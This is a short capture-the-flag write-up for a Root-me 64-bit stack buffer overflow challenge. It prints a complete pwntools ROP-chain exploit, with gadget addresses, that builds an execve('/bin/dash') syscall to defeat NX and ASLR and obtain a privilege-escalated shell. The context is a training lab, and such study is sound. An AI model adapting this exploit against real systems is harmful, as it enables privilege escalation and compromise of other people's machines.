Root-me




ELF64 - Stack buffer overflow - advanced


char buffer[256]; gets(buffer); # the vulnerable part !!!!

As You may see it looks simple but the problem is it is protected by ASLR,NX,RELRO ... :(
So the only way is to do ROP or to overwrite GOT table .. but i went on with ROP .
AS this binary is 64 bits the syscall table differ completely ..(which at the first i dont know but ROPgadget helped me out)
So according to syscall table RAX=59 ,RDI='/bin/dash', RSI && RDX = *(NULL)


from pwn import * context.bits=64 p = 'A'*280 # execve() p += pack(0x00000000004017e7) # pop rsi ; ret p += pack(0x00000000006c0000) # @ .data p += pack(0x000000000044d2b4) # pop rax ; ret p += '/bin/das' p += pack(0x0000000000467b51) # mov qword ptr [rsi], rax ; ret p += pack(0x00000000004017e7) # pop rsi ; ret p += pack(0x00000000006c0008) # @ .data + 8 p += pack(0x000000000044d2b4) # pop rax ; ret p +='h\x00\x00\x00\x00\x00\x00\x00' p += pack(0x0000000000467b51) # mov qword ptr [rsi], rax ; ret p += pack(0x00000000004016d3) # pop rdi ; ret p += pack(0x00000000006c0000) # @ .data p += pack(0x00000000004017e7) # pop rsi ; ret p += pack(0x00000000006c0010) # @ .data + 16 p += pack(0x000000000041bd9f) # xor rax, rax ; ret p += pack(0x0000000000467b51) # mov qword ptr [rsi], rax ; ret p += pack(0x00000000004017e7) # pop rsi ; ret p += pack(0x00000000006c0010) # @ .data + 16 p += pack(0x0000000000437205) # pop rdx ; ret p += pack(0x00000000006c0010) # @ .data + 16 p += pack(0x000000000041bd9f) # xor rax, rax ; ret p += pack(0x000000000045aa10)*59 # add rax, 1 ; ret p += pack(0x0000000000400488) # syscall s=process('ch34') s.send(p) s.interactive()

NOTE: /bin//sh && /bin/bash gave me a local shell but only /bin/dash gave privilege escalated shell :)

Also ROPgadget doesen't find all the gadgets (for ex: syscall;ret) so i found that using rp++



For future references :
link for 64 bit syscall table http://blog.rchapman.org/posts/..
link for 32 bit http://syscalls.kernelgrok.com/